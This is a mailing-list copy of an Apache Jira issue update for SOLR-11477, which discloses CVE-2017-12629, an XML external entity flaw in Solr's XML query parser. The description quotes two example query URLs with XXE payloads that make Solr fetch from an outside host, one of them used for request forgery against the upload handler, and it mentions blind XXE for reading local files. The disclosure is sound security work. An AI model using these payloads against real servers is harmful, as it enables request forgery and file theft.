[jira] [Updated] (SOLR-11477) CVE-2017-12629: Disable external entities in XML query parser

Wed, 18 Oct 2017 05:23:26 -0700 

     [ 
https://issues.apache.org/jira/browse/SOLR-11477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-11477:
---------------------------------
    Security: Public  (was: Private (Security Issue))

> CVE-2017-12629: Disable external entities in XML query parser
> -------------------------------------------------------------
>
>                 Key: SOLR-11477
>                 URL: https://issues.apache.org/jira/browse/SOLR-11477
>             Project: Solr
>          Issue Type: Task
>      Security Level: Public(Default Security Level. Issues are Public) 
>          Components: query parsers, security
>            Reporter: Christine Poerschke
>            Assignee: Uwe Schindler
>            Priority: Blocker
>             Fix For: 5.5.5, 7.1, 7.2, master (8.0), 6.6.2
>
>         Attachments: SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, 
> SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, 
> SOLR-11477.patch, SOLR-11477.patch
>
>
> Lucene includes a query parser that is able to create the full-spectrum of 
> Lucene queries, using an XML data structure. Starting from version 5.1 Solr 
> supports "xml" query parser in the search query.
> The problem is that lucene xml parser does not explicitly prohibit doctype 
> declaration and expansion of external entities. It is possible to include 
> special entities in the xml document, that point to external files (via 
> file://) or external urls (via http://):
> Example usage: 
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a 
> SYSTEM "http://xxx.s.artsploit.com/xxx";><a></a>'}
> {noformat}
> When Solr is parsing this request, it makes a HTTP request to 
> http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition. 
> Considering that we can define parser type in the search query, which is very 
> often comes from untrusted user input, e.g. search fields on websites. It 
> allows to an external attacker to make arbitrary HTTP requests to the local 
> SOLR instance and to bypass all firewall restrictions.
> For example, this vulnerability could be user to send malicious data to the 
> '/upload' handler:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a 
> SYSTEM 
> "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true";'><a></a>'}
> {noformat}
> This vulnerability can also be exploited as Blind XXE using ftp wrapper in 
> order to read arbitrary local files from the solrserver.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]

Reply via email to